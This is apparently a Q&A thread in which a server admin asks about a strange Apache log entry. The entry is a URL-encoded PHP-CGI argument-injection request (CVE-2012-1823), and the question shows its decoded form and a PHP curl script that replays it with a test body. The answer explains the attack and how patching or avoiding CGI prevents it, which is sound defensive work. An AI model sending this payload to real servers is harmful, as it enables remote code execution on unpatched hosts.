# phppath/php as URL has strange behaviour and seems to be an attack

Tags: apache-2.2, php, security, logging

**Warning: The following requests might harm your server.**

I got some strange things in the apache log:

```
"POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 276 "-" "-"
```

This means:

```
POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n
```

As you can see this gives 200 but when I run it with curl:

```
<?php
 $ch = curl_init();

 curl_setopt($ch, CURLOPT_URL, "http://aussehenwie.de/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E");
 curl_setopt($ch, CURLOPT_HEADER, 0);
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, "<?php echo 'hacked'; ");

 echo curl_exec($ch);

 curl_close($ch);
 ?>
```

It returns a 404. This is the same when I run it from terminal.

Why is that so?
And what is this awkward URL doing?

Answer (score 2, accepted):

This is known as one of CGI attacks, effective when someone uses unpatched or incorrectly configured web server.

Example of vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823

It's overriding php.ini settings set on the server and executing the file from input/URL.

If you are updating your software on time or you don't use CGI interface on your web server (in case of apache - mod_cgi mod_fastcgi mod_fcgid etc i.e. not mod_php) to interact with PHP - there is nothing to worry about. Constant attacks/scans like this have permanent behavior.

Comment: Right, but I still do not know why it's 200 in the logs and 404 to the client.

Comment: because "http://aussehenwie.de/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E" returns 404 :)

Comment: Don't know, must have details on your configuration.